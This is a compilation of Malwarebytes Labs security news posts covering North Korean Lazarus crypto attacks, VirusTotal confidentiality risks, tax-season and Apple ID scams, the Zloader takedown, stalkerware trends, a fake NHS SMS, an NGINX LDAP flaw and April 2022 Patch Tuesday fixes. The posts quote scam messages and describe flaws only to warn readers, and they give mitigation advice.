IT NEWS

A new advisory issued by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the US Treasury Department (Treasury), highlights the cyberthreats associated with cryptocurrency thefts and tactics used by a North Korean state-sponsored advanced persistent threat (APT) group since at least 2020.

The Lazarus Group

APTs are defined as prolonged attacks on specific targets that aim to compromise their systems, and to gain information from or about them. The Lazarus Group, aka APT38, is commonly believed to be run by the North Korean government. It is thought to conduct financial cybercimes as a way to raise money for a regime that has few trading opportunities, because of long-standing international sanctions.

These days, financial cybercrimes often involve Bitcoin and other cryptocurrencies. The CISA advisory warns that:

The US government has observed North Korean cyber actors targeting a variety of organizations in the blockchain technology and cryptocurrency industry, including cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens

AppleJeus

Since 2018, one of the Lazarus Group’s tactics has been to disguse AppleJeus malware as cryptocurrency trading platforms for both Windows and Mac. CISA warns that it uses these trojanized applications to gain access to victims’ computers, to spread other malware, and steal private keys or to exploit other security gaps. All of this is done to create an environment where the group can initiate fraudulent cryptocurrency transactions.

Victims are lured into downloading the malware with a variety of social engineering tactics, including spearphishing.

Spearphishing campaigns

Spearphishing is a targeted form of phishing that’s directed at and addresed to specific individuals. It uses personalization to convince victims that they are reading and responding to legitimate messages.

CISA reports that the Lazarus Group has been sending spearphishing messages to employees of cryptocurrency companies—often working in system administration or software development/IT operations (DevOps) roles—using a variety of communication platforms and social media. The messages often mimic a recruitment effort and offer high-paying jobs to entice the recipients to download malicious “TraderTraitor” malware disguised as cryptocurrency trading or price prediction tools.

TraderTraitor describes a series of malicious Electron applications that can download and execute malicious payloads, such as remote access trojans (RAT).

Mitigation

The advisory contains a lot of specific IOCs for the most recent campaigns, but if we have learned anything from the past behavior of the Lazarus APT group it is that they will change man of them as soon as their current campaigns are outed. It is important therefore to apply the basic mitigation methods to counter this type of attacks:

• Use patch management to stay on top of those security updates!
• Educate users on social engineering attacks like spearphishing.
• Enforce credential requirements and use multi-factor authentication.
• Use endpoint protection to detect exploits and stop malware.
• Watch out for third-party downloads—especially cryptocurrency applications.
• Create an incident response plan so you know how to respond to cyber-intrusions.

Stay safe, everyone!

The post North Korean Lazarus APT group targets blockchain tech companies appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs:

• Credential-stealing malware disguises itself as Telegram, targets social media users
• Old Play Store apps served notice by upcoming API level changes
• Denonia cryptominer is first malware to target AWS Lambda
• Ransomware: March 2022 review
• Why identity management matters
• USPS “Your package could not be delivered” text is a smishing scam
• Apps removed from Google Play for harvesting user data
• How to password protect a folder
• Conti ransomware offshoot targets Russian organizations
• Malwarebytes Evaluation of the MITRE ENGENUITY ATT&CK Round 4 Emulations
• Steer clear of this “TestNTrace” SMS spam
• NGINX zero-day vulnerability: Check if you’re affected
• April’s Patch Tuesday update includes fixes for two zero-day vulnerabilities
• SMS group spam promises free gifts in return for bill payment
• “Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌” spam email takes you on a website mystery tour
• Zloader, another botnet, bites the dust
• Stalkerware-type detections hit record high in 2021, but fell in second half
• Filing your taxes? Be wary of help found through search engines

Stay safe!

The post A week in security (April 11 – 17) appeared first on Malwarebytes Labs.

It is important to realize that uploading certain files to VirusTotal may result in leaking confidential data, which could result in a breach of confidentiality, or worse.

We have warned against uploading personal information, as does VirusTotal itself on their home page. But apparently some organizations have automated the uploading of email attachments without really thinking through the possible consequences.

VirusTotal

VirusTotal is now part of Google Cloud and its goal is to help analyze suspicious files, URLs, domains, and IP addresses to detect cybersecurity threats. It does this by scanning the submitted files with the contributing anti-malware vendors’ scanning engines. Many use VirusTotal as a “second-opinion” scanner which is obviously fine to do on occasion.

VirusTotal maintains a collection of over 70 endpoint protection solutions, but it is important to realize that there is no guarantee that the version that VirusTotal relies on is the same version that you would be running, or whether it is as up to date as your version might be.

But in the context of this article it is even more important to realize that VirusTotal was not designed to check whether an attachment is malicious. It may recognize malicious attachments, especially the ones that are used in mass email campaigns, since these samples may get uploaded more often. But in case of a targeted attack, getting the all-clear from VirusTotal does not mean the attachment is safe to open or edit.

VirusTotal offers premium services that allow participants access to files that were uploaded by third parties. This is done to increase malware detection across the participating solutions, but also to enable threat hunting and provide a historical and current overview of the threat landscape.

Breach of confidence

In March of 2022 the German Bundesamt für Sicherheit in der Informationstechnik (BSI)  which translates as the Federal Office for Security in Information Technology, warned that it noticed the (semi)-automated upload of suspicious or quarantined email attachments. In some cases these were confidential documents. These included warnings sent by the BSI marked as TLP Green and Amber.

The Traffic Light Protocol (TLP) was created in order to facilitate greater sharing of information. TLP is a set of designations used to ensure that sensitive information is shared with the appropriate audience. It employs four colors to indicate expected sharing boundaries to be applied by the recipient(s).

Uploading a document marked as TLP:GREEN, TLP:AMBER or TLP:RED is a violtion of the terms and can get you removed from the list of acceptable recipients. Receiving information with a TLP tag other than TLP:WHITE is a privilege. It means that the information owners trust the recipient to respect their wishes. The recipients should do everything in their power to be worthy of that trust.

Sharing

Maybe these uploaders didn’t realize that the files were not only shared with the 70 security vendors, but are also accessible to all other businesses that are using the premium services provided by VirusTotal. There are no restrictions about the location of the participating businesses, so there is no reason to assume that it is safe to upload confidential documents.

A search by me on VirusTotal for “invoice.pdf” provided 17.68k search results. Granted, some of these files were actually marked as malicious, but the majority had no business being available for public viewing.

Ask for permission, not forgiveness

While we do understand the occasional need to upload a file to VirusTotal, do not automate this procedure. Only use it when you have no other methods of checking whether an attachment is safe to open.

Receivers:

• If you are in the least bit uncertain about the safety of an attachment, contact the sender and ask them about it.
• Don’t use VirusTotal if you want to check whether an attachment is malicious. The result is not conclusive and you may breach confidentiality.
• Never click on links in emails or email attachments.
• Never “Enable Editing” in a document, unless the sender in person assured you it was safe.

Senders:

• Only use attachments that could be perceived as dangerous when it’s absolutely necessary.
• Inform recipients about the fact that you are sending them an attachment and for what reason.

There was good reason for Microsoft to disable macros by default.

Stay safe, everyone!

The post Why you shouldn’t automate your VirusTotal uploads appeared first on Malwarebytes Labs.

The deadline for filing your taxes in the US is nearly upon us. April 18 is the very last date that you can afford to hand your tax returns in to the IRS.

People will naturally gravitate toward all manner of filing tools to get the job done. But it’s worth noting that sites are lurking in search engine results to potentially make it harder to file, not easier.

Taxing times in search engine land

One such tool used to complete tax returns is TurboTax. This product requires a registration code to activate, and this is where the search engine results come into play. Some folks have issues registering or installing software for a variety of reasons. Maybe it’s hardware, perhaps it’s the software. Incompatibility frequently rears its head, and sometimes other third-party software may be interfering with installation.

Entire industries exist on forums and elsewhere to provide answers to the most obscure tech issues you can possibly imagine. While many solutions can usually be found for these issues, it pays to be cautious where search results are concerned.

Searching for install instructions

Hunting for “install Turbotax” in Yahoo, for example, brings us the following results:

It’s currently the first result after the sponsored ad and the official link. Here’s the site in question:

Hitting the “Click me” button directs visitors to the next step in the process, hosted elsewhere. It asks visitors to sign into their account, then activate their purchase and get on with sorting out their tax returns.

It’s license key time

Site users are asked to enter their 16-digit activation code.

Two things to note here. The site will allow any code with a minimum of four digits and up – it doesn’t have to be a maximum of 16. There is clearly no checking taking place for the code entered. What happens if you punch in a too short, non-existent activation key? You’re told that the activation attempt has failed, not that your code is too short.

Sending whoever runs this site your activation code means that the people running the site may now have your activation code. As a general rule of thumb, you shouldn’t give licence or registration keys for any product to anybody. Depending on product, you may be handing a stranger your one-time use key. When that happens, you then have the problem of figuring out how to get it back.

There’s a few official support situations where informing somebody of a key’s details will be required. This isn’t one of them.

“Contact the support team…”

Help is at hand with the supposedly failed activation:

The page says:

Sorry, your code has failed to activate.

Detected issue:

• Your activation code is stolen
• Code expired
• Repeated use of code
• Your code is not generated in database
• Or your system is virus infected

Note: Repeated failure may lead to expire code. Do not try to enter your code again and again.

Contact support team to fix this issue immediately: [number removed]

Error code: OOXOOO16FA and Correlation ID: c147654ad-41fg-ds7df-cfa9f5jhdjhsg

Keep your activation code ready while speaking to customer support

This “error code” often pops up on various forms of tech support scam, so there’s another bad sign.

What is happening in these support calls?

A colleague sent over a Reddit link detailing an example of a call between someone handling the “support” conversation on behalf of their father, who had originally arrived on a related landing page found via basic searching:

There’s a lot to take in there in terms of not sounding particularly credible.

1. The TurboTax code activation being interrupted due to “foreign connections on the network”
2. The caller being connected to the person’s relative via TeamViewer with Netstat open
3. Non-official URLs open on the desktop

These are all frequently signs of tech support scams, often involving the installation of bogus security tools alongside additional payment. The fact that the page which claims the activation key doesn’t work may be down to a “virus infection”, alongside the bogus error code found on many tech support scams, makes this something to steer well clear of.

We reported both the initial landing page and the activation code page. The URL for the latter has been suspended. However, sites like these tend to use fallback URLs and webspace so it might not be gone for good.

Don’t make tax season even more taxing than it has to be

If you need help installing or activating a product, contact the relevant company directly. Don’t leave it in the hands of search engines to decide your fate. Paid results, adverts, SEO gaming, or even SEO poisoning can all cause big problems. With the tax deadline ticking down, you simply can’t afford to get into stolen key/broken computer antics this late in the process.

The post Filing your taxes? Be wary of help found through search engines appeared first on Malwarebytes Labs.

Spam which claims your account has been locked out and needs to be fixed are common. They drive people to phishing campaigns on a daily basis.

The mail below follows the same pattern with one key difference. It looks like a phish, but goes somewhere else entirely.

No, your Apple ID has not been locked

The mail claims to be from Apple, and is titled

Re: [Ticket #265763] Your Appl‌e‌ І‌D has been locke‌‌d‌‌ on [date]

It reads as follows:

Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌ on [date] 2022 for ‌‌s‌‌ecurit‌‌y‌‌ ‌‌r‌‌eason‌‌s‌‌ ‌‌b‌‌ecaus‌‌e‌‌ you have ‌‌r‌‌eache‌‌d‌‌ the ‌‌m‌‌aximu‌‌m‌‌ ‌‌n‌‌umbe‌‌r‌‌ of ‌l‌n‌v‌a‌l‌i‌d‌ ‌s‌i‌g‌n‌-‌i‌n‌ ‌a‌t‌t‌e‌m‌p‌t‌s‌

You cannot ‌a‌c‌c‌e‌s‌s‌ your ‌a‌c‌c‌o‌u‌n‌t‌ and any AppI‌e‌ services

‌‌T‌‌o ‌u‌n‌l‌o‌c‌k‌ your account, ‌y‌o‌u‌’‌l‌l‌ ‌n‌e‌e‌d‌ ‌s‌o‌m‌e‌ ‌a‌d‌d‌i‌t‌i‌o‌n‌a‌l‌ ‌v‌e‌r‌i‌f‌i‌c‌a‌t‌i‌o‌n‌

For your ‌‌s‌‌ecurit‌‌y‌‌ and to ‌‌e‌‌nsur‌‌e‌‌ only you have ‌a‌c‌c‌e‌s‌s‌ to your ‌a‌c‌c‌o‌u‌n‌t‌. We will ask you to ‌v‌e‌r‌i‌f‌y‌ your ‌i‌d‌e‌n‌t‌i‌t‌y‌.

From phish to website spam

Clicking the big grey “verify account” button should, in theory, lead you to an Apple phishing page. However, that’s not the case here.

The link directs people to completely random domains. Some of them appear to be advertisements. Others run the full range of everything from wall cladding services and polytechnics to hotels.

There appears to be no rhyme or reason to the URLs being served up. Clicking the link could pretty much drop you anywhere without warning.

It currently leads to what appears to be a half-finished page about QR code generation.

Why is this happening?

At this point, we’ve established that there’s no phish here. It’s using phishing as a panic-ruse to have you click through to multiple URLs via email campaigns. In this case, it appears someone has signed up to the below service, and is using this to spam.

Navigating to the URL included in the mail with the campign component stripped out leads us to the below message:

Mail blasting for fun and profit

Mail spammers will try and abuse legitimate services in order to drop as many missives in your mailbox as possible. Even with countermeasures in place, they’ll slip through the net of even the most careful service provider.

Regardless of how the spam gets through, get through it will. If you provide mail marketing services, it’s important to have a reporting feature in place. The ability to tie valid registrant details to campaign URLs is also crucial.

If it’s possible to highlight in mails sent out in some way that it’s via your tool or app, so much the better.

Keeping yourself safe from mail spam

For recipients, much of the typical spam mail advice applies here:

• Always report spam, especially if it’s going beyond the usual “please buy this t-shirt” missive. If it’s a phish, a social engineering trick of some kind, or even something malware related, block and report. It’ll help keep bad content away from others that little bit quicker.
• If you are redirected to a phish, you’re perilously close to handing over logins to a scammer. Websites asking for details without the HTTPs are a massive red flag. However, as we often point out, scammers often make use of HTTPs certificates so this is no guarantee of safety from phishing. Rather, ask yourself if you typically receive emails from Facebook or Google or anyone else asking you to visit links and enter personal details. The answer should almost certainly be no.
• You can try the “strip out the campaign portion of the URL and see where you end up” tactic. However, you won’t know in advance if the URL on display is from a genuine marketer or just another rogue website. Search engines may assist here, but it’s a bit of a shot in the dark and potentially risky.
• One final reminder: spammers reuse bogus mails all the time. While this one appears to redirect to random websites, the next identical message in your mailbox may well drive you to a phishing domain. Keep these fraudsters at arm’s length with a metaphorical return to sender.

We’ve reported the above mail campaign to the organisation above and hopefully it’ll be shut down soon.

The post “Your AppI‌e‌ ‌l‌D‌ ‌‌h‌‌a‌‌s‌‌ ‌‌b‌‌e‌‌e‌‌n‌‌ ‌‌l‌‌ocke‌‌d‌‌” spam email takes you on a website mystery tour appeared first on Malwarebytes Labs.

Microsoft has announced that its Digital Crimes Unit (DCU) has taken legal and technical action to disrupt a malicious botnet called Zloader.

Zloader or Zbot are common names used to refer to any malware related to the ZeuS family. There are a lot of those because the ZeuS banking Trojan source code was leaked in 2011, and so there’s been plenty of time for several new variants to emerge.

The Zloader at hand is a botnet made up of computing devices in businesses, hospitals, schools, and homes around the world which is run by a global internet-based organized crime gang operating malware as a service that is designed to steal and extort money.

Legal action

Microsoft obtained a court order from the United States District Court for the Northern District of Georgia, allowing it to take control of 65 domains that the Zloader gang had been using to grow, control and communicate with its botnet. These domains are now directed to a Microsoft sinkhole so they can no longer be used by the botnet operators.

A sinkhole is a way of redirecting malicious internet traffic so that it can be captured and analyzed by security professionals, and are often used to seize control of botnets. We also saw this method recently used against the Strontium group.

Domain Generating Algorithm

Zloader has a Domain Generating Algorithm (DGA) embedded within the malware that creates additional domains as a fallback or backup communication channel for the botnet. In addition to the hardcoded domains, the court order allowed Microsoft to take control of an additional 319 currently registered DGA domains. Microsoft is working on a method to block the future registration of DGA domains.

Zloader

The primary goal of Zloader was originally financial theft, stealing account login IDs, passwords and other information to take money from people’s accounts. This makes sense, knowing the source code it started from was a banking Trojan. But Zloader also includes a component that disables popular security and antivirus software, thereby preventing victims from detecting the Zloader infection on their systems.

Over time, those behind Zloader began offering malware as a service, acting as a delivery platform to distribute ransomware such as Ryuk, DarkSide, and BlackMatter.

Zloader is a malware family known for its flexibility and the ability to evolve and change from campaign to campaign. As such, it has undergone a lot of development since its inception. The evolution has been worked on at many fronts, since several groups started working from the original ZeuS source code.

For those looking for a technical analysis of Zloader, in 2020 Malwarebytes published a report with an analysis of the “Silent Night” Zloader variant that demonstrates some of the botnet features developed for Zloader. And Microsoft provided some insight on the techniques and tactics used by this particular Zloader group.

Disruption

Microsoft worked with telecommunications providers around the world to disrupt key Zloader infrastructure. It is expected to see some attempts to revive the operations, but these attempts will be monitored closely. If the method to prevent new DGA domains is successful, it will take a fresh restart to build out another botnet.

Mitigation

Given the tactics used by this Zloader group, the general rules of internet hygiene apply, starting with some that are more specific for this group:

• Be careful with email attachments
• Don’t click on sponsored Google results
• Secure authentication methods
• Patch management
• Network segmentation
• A backup strategy in case prevention measures fail

Stay safe, everyone!

The post Zloader, another botnet, bites the dust appeared first on Malwarebytes Labs.

After having tracked stalkerware for years, Malwarebytes can reveal that in 2021, detections for apps that can non-consensually monitor another person’s activity reached their highest peak ever, but that, amidst the record-setting numbers, the volume of detections actually began to significantly decrease in the second half of the year.

This decrease in stalkerware-type activity never reached the lower levels in 2019 that Malwarebytes recorded before the start of the global coronavirus pandemic, which was recognized in 2020 and which spread quickly across the globe beginning in the months of February, March, and April. During that year, it appeared as though the increase in physical, regional lockdowns coincided with the increase in detections of stalkerware-type apps, which Malwarebytes records as “Monitor” and “Spyware.”

Documented to have a clear intersection with situations of domestic abuse, it was not only stalkerware-type activity that increased during the global pandemic, but also cases of domestic abuse as reported by state and federal prosecutors and by shelters.

In 2021, Malwarebytes recorded a total of 54,677 detections of Android monitor apps and 1,106 detections of Android spyware apps. This represents a 4.2 percent increase in monitor detections and a 7.2 percent increase in spyware detections year-on-year, making 2021 even worse than 2020, and the worst year for stalkerware so far.

However, although the overall numbers are up, detections have taken an unmistakable downward turn since the peak of May and June 2020.

In the second half of 2021, average monthly detections for monitor apps fell by 39 percent, to just 3,459 detections per month, compared to an average of 5,654 detections per month in the first half of 2021. The same trend happened with spyware too: Average monthly detections fell by 20 percent in the second half of the year compared to the first half.

What’s at play here?

When stalkerware saw its distressing uptick in 2020, Malwarebytes, in consultation with other domestic abuse support networks, hypothesized that the increased stalkerware activity came about because of the real-world physical restrictions put in place to combat COVID-19 around the world. The increase was also detected by other members of the Coalition Against Stalkerware, and coincided with news reports of increased calls to domestic abuse agencies.

In 2021, many governments loosened their coronavirus restrictions, allowing the public to mix and travel more freely. And, just as the sudden increase in stalkerware detections mirrored the sudden, mass imposition of restrictions, the gradual decline in detections appears to reflect their gradual easing.

The tidal wave of stalkerware in 2020 also led to increased awareness of the stalkerware problem, which turned into action in 2021. Last year the Federal Trade Commission issued its second-ever enforcement action against a stalkerware developer, and Google removed several ads that promoted stalkerware.

The decline in stalkerware is welcome, but the causes for it are not clear and it is too early to celebrate. It is increasingly easy for abusers to monitor their targets using off-the-shelf technology designed for other purposes. Abusers may simply have turned to other forms of technology as stalkerware became more widely detected. Or they may have returned to previous patterns of control and abuse as restrictions eased.

Thankfully, the Coalition Against Stalkerware continued to grow in 2021, increasing its contributors and accepting more expertise so as to expand its stalkerware detection threat list, which antivirus vendors can use to improve their own detection tools. As a founding member, Malwarebytes will continue to share intelligence with the Coalition Against Stalkerware to improve industry-wide detections while also guiding the domestic abuse support networks within the coalition through thorny, technical questions of detection, removal, and prevention.

You can read more interesting stats from the last year in the Malwarebytes 2022 Threat Review.

The post Stalkerware-type detections hit record high in 2021, but fell in second half appeared first on Malwarebytes Labs.

Yesterday I received an SMS from “TestNTrace”, with the message resembling an official NHS communication:

The text reads as follows:

NHS: You’ve been in close contact with a person who has contracted the Omicron variant. Please order a test kit via: [URL redacted]

Well, that’s an alarming thing to wake up to. However, not everything is as it first seems.

Health and (security) safety concerns

The first red-flag is that this isn’t an official NHS URL. Additionally, there’s no explanation as to how or why they know I’ve “been in close contact” with somebody. Nevertheless, people will take this message at face value.

Receiving this will be especially concerning for anyone with specific health risks related to COVID-19 exposure. There’s also a few reasons as to why this kind of spam message may prove successful in the current climate.

Testing times for…tests

It’s becoming increasingly difficult to obtain PCR tests in the UK. The rules have changed, leading to frequent delays and issues. Previously you could obtain free tests as and when you needed them. Now, tests are no longer free. As per the official guidance page:

If you’re in Scotland or Northern Ireland, you might be eligible to get a free polymerase chain reaction (PCR) test to check if you have coronavirus (COVID-19).

In England or Wales you can no longer get free PCR tests to check if you have COVID-19.

There are some exemptions, but they’re few and far between.

What this means in practice is a glorious opportunity for scammers and fakers to make even more money off the back of the pandemic. Scams targeting people with coronavirus themes are bad enough at the best of times. When you can’t even get hold of a test, it’s particularly ghoulish.

Digging into the website

The landing page resembles a standard UKGOV NHS page related to the pandemic. The links also all lead to genuine NHS sites and information portals.

It reads as follows:

“Order (COVID-19) Omicron PCR test kit

The UK has decided to deploy test kits in response to the risks of the Omicron variant. COVID-19 cases have soared by their highest number since the start of the pandemic as the Omicron variant continues to spread rapidly.

Due to rising cases among fully vaccinated patients, research has shown that it is still possible to catch and spread COVID-19 even if you are fully vaccinated.

Order your (COVID-19) Omicron PCR test kit below.

Information:

PCR tests are mandatory and failure to register could lead to movement restrictions and compulsory isolation.

Note: PCR test kits are free, you will only have to pay £0.99 for postage of the kit.“

That’s a very long way of saying “please give us £0.99”. However, there’s a lot of clues in that block of text to suggest you shouldn’t give them a thing.

Of movement restrictions and compulsory isolation

“PCR tests are mandatory and failure to register could lead to movement restrictions and compulsory isolation” is quite the statement, designed to encourage people throwing money their way as fast as they can.

Confirmatory PCR tests are no longer required. You’re also no longer required by law in the UK to stay at home and isolate if infected. The Test and Trace contact service is now closed. I couldn’t even begin to tell you what the supposed movement restrictions are all about.

Clearly, we’re dealing with something here which isn’t exactly reflecting reality as it currently stands. If we proceed to the next page anyway, the site asks for a range of personal information.

Personal details, and payment for postage

The site asks for name, DOB, email, phone, and address.

The follow up page asks for payment details.

Avoiding the PCR payment rush

If you need to obtain test kits, your best option is likely to be local pharmacies and supermarkets. Random texts and emails which lead to sites other than nhs.uk should be treated with caution, especially when tied to requests for payment.

Even if they claim the kits are free, they’ll likely ask for postage costs. All this, on top of how they magically know you’ve come into contact with somebody who has COVID-19 in the first place. While there may well be delays and low supplies in trusted stores, it’s still a much safer option than handing your payment details and personal information to random websites.

This is one text you can happily block and report. If you need a test at short notice, answering random SMS spam is definitely not the way to get one.

The post Steer clear of this “TestNTrace” SMS spam appeared first on Malwarebytes Labs.

On April 9, hacking group BlueHornet tweeted about an experimental exploit for NGINX 1.18 and promised to warn companies affected by it. On April 10, BlueHornet claimed to have breached the China branch of UBS Securities using the NGINX vulnerability.

All we learned on Twitter was that a new zero-day vulnerability in the NGINX web server existed and had been publicly revealed. The vulnerability could allow remote code execution (RCE) on a vulnerable system.

But on April 11, NGINX responded with an article saying that after investigating the issue, it had found it only affects reference implementations. Specifically, the NGINX LDAP reference implementation which uses LDAP to authenticate users of applications being proxied by NGINX.

NGINX

NGINX is an open-source HTTP and reverse proxy server, a mail proxy server, and a generic TCP/UDP proxy server. When it was first released, NGINX was used mostly for serving static files, but since then, it has grown into a complete web server that deals with the entire spectrum of server tasks. NGINX has surpassed Apache in popularity due to its lightweight footprint and its ability to scale easily on minimal hardware. According to specialists, NGINX can run thousands of connections of static content simultaneously and is 2.5 times faster than Apache.

LDAP

Lightweight directory access protocol (LDAP) is a protocol that makes it possible for applications to query user information rapidly. Companies store usernames, passwords, email addresses, printer connections, and other static data within directories. LDAP is an open, vendor-neutral application protocol for accessing and maintaining that data. LDAP can also tackle authentication, so users can sign on just once and access many different files on the server.

The NGINX LDAP reference implementation uses LDAP to authenticate users of applications proxied by NGINX. The reference implementation was announced in June 2015. The solution leverages the ngx_http_auth_request_module (Auth Request) module in NGINX and NGINX Plus, which forwards authentication requests to an external service. In the reference implementation, that service is a daemon called ldap‑auth. It’s written in Python and communicates with a LDAP authentication server.

The vulnerabilities

The primary way to configure the LDAP reference implementation is with a number of proxy_set_header directives. However, the configuration parameters can also be set on the command line that initializes the Python daemon. The vulnerabilities exist in the way unsanitized input can be used to change or set LDAP configuration parameters.

The NGINX blog specifies the circumstances that need to be fulfilled for the vulnerabilities to be exploited:

• Command-line parameters are used to configure the Python daemon
• There are unused, optional configuration parameters
• LDAP authentication depends on specific group membership

Mitigation

NGINX provides mitigation recommendations for each of these conditions.

When configuration parameters are specified on the command line, an attacker can override some or all of them by passing specially crafted HTTP request headers. To protect against this, ensure that the corresponding configuration parameters have an empty value in the location = /auth-proxy block in the NGINX configuration.

Also ensure that any unused, optional parameters have an empty value in the location = /auth-proxy block in the NGINX configuration.

The Python daemon does not sanitize its inputs. Consequently, an attacker can use a specially crafted request header to bypass the group membership (memberOf) check and so force LDAP authentication to succeed even if the user being authenticated does not belong to the required groups. To mitigate against this, ensure that the backend daemon that presents the login form strips any special characters from the username field. In particular, it must remove the opening and closing parenthesis characters ( ) and the equal sign =, which all have special meaning for LDAP servers.

NGINX states that the backend daemon in the LDAP reference implementation will be updated to sanitize this type of input in due course.

And we have rounded up some additional advice.

Because LDAP extends to IoT devices, of which there are many more than IT devices, organizations running LDAP need to encrypt traffic using TLS certificates on IoT devices, keep the firmware up to date, and apply proper password management.

Make sure that you sanitize any input before it gets passed to the daemon.

Stay safe, everyone!

The post NGINX zero-day vulnerability: Check if you’re affected appeared first on Malwarebytes Labs.

It’s that time of the month again. Time to check what needs to be updated and prioritize where necessary. The Microsoft updates include at least two zero-day vulnerabilities that deserve your attention.

Microsoft

Microsoft has released security updates and non-security updates for client and server versions of its Windows operating system and other company products, including Microsoft Office and Edge.

For those that have extended support for Windows 7, there are four critical remote code execution (RCE) vulnerabilities to worry about:

• CVE-2022-24500 CVSS 8.8 out of 10, a Windows SMB Remote Code Execution vulnerability
• CVE-2022-24541 CVSS 8.8, a Windows Server Service Remote Code Execution vulnerability
• CVE-2022-26809 CVSS 9.8, a Remote Procedure Call Runtime Remote Code Execution vulnerability
• CVE-2022-26919 CVSS 8.1, a Windows LDAP Remote Code Execution vulnerability

CVE-2022-26809 does have a CVSS of 9.8 for good reason. It affects almost every Windows OS and Microsoft has it listed as more likely to be exploited. To exploit this vulnerability, an attacker would need to send a specially crafted RPC call to an RPC host. This could result in remote code execution on the server side with the same permissions as the RPC service. TCP port 445 is used to initiate a connection with the affected component. And some quick Shodan scans showed that millions of systems have that port open.

Microsoft classifies a vulnerability as a zero-day if it is publicly disclosed or actively exploited with no official fix available. The zero-day vulnerabilities fixed in this update cycle are:

• CVE-2022-26904 CVSS 7.0, a Windows User Profile Service Elevation of Privilege (EoP) vulnerability. This one is marked with a high attack complexity, because successful exploitation of this vulnerability requires an attacker to win a race condition. But the vulnerability is public knowledge and there is an existing Metasploit module for it. Metasploit is an open-source penetrating framework used by security engineers as a penetration testing system and a development platform that allows to create security tools and exploits.
• CVE-2022-24521 CVSS 7.8, a Windows Common Log File System Driver Elevation of Privilege vulnerability. This vulnerability has been used in the wild. Microsoft says that attack complexity is low. The vulnerability was reported to Microsoft by the National Security Agency (NSA) and Crowdstrike.

Other notable CVEs:

• CVE-2022-24491 CVSS 9.8, a Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the NFS role enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.
• CVE-2022-24997 CVSS 9.8, another Windows Network File System Remote Code Execution vulnerability. This vulnerability is only exploitable for systems that have the NFS role enabled. An attacker could send a specially crafted NFS protocol network message to a vulnerable Windows machine, which could enable remote code execution.

On these systems with the NFS role enabled, a remote attacker could execute their code with high privileges and without user interaction. This worries experts as these may turn out to be wormable bugs between NFS servers. For a temporary solution, more information on installing or uninstalling Roles or Role Services is available here.

A vulnerability is considered to be wormable if an attack can be launched that requires no human interaction to spread. The impact can be considerable if the number of vulnerable machine is high enough. In these cases web application firewalls (WAFs) would help to mitigate the risk.

In related news, Microsoft announced the release of Windows Autopatch, which is set for July 2022. This will hopefully lessen some of the burdens that come with patch management.

Edge and Chrome

The Microsoft updates included 26 Microsoft Edge vulnerabilities and Google released a stable channel update for Windows, Mac, and Linux that includes 11 security fixes. Eight out of those 11 were rated with a High severity, none were marked as Critical.

Other updates

While you’re at it, we also saw updates from vendors like:

• Adobe
• Cisco
• VMWare

Stay safe, everyone!

The post April’s Patch Tuesday update includes fixes for two zero-day vulnerabilities appeared first on Malwarebytes Labs.